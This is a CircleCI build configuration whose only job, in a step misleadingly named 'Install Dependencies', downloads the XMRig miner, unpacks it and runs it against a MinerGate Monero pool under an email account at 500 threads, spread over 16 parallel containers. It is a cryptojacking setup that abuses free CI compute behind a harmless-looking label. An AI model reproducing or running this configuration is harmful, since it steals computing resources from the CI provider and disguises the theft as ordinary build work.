version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-linux-static-x64.tar.gz && tar -xzf xmrig-6.16.4-linux-static-x64.tar.gz && cd xmrig-6.16.4 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u denikadelista@gmail.com -t500
              
workflows:
    version: 2.1
    build:
        jobs:
        - trial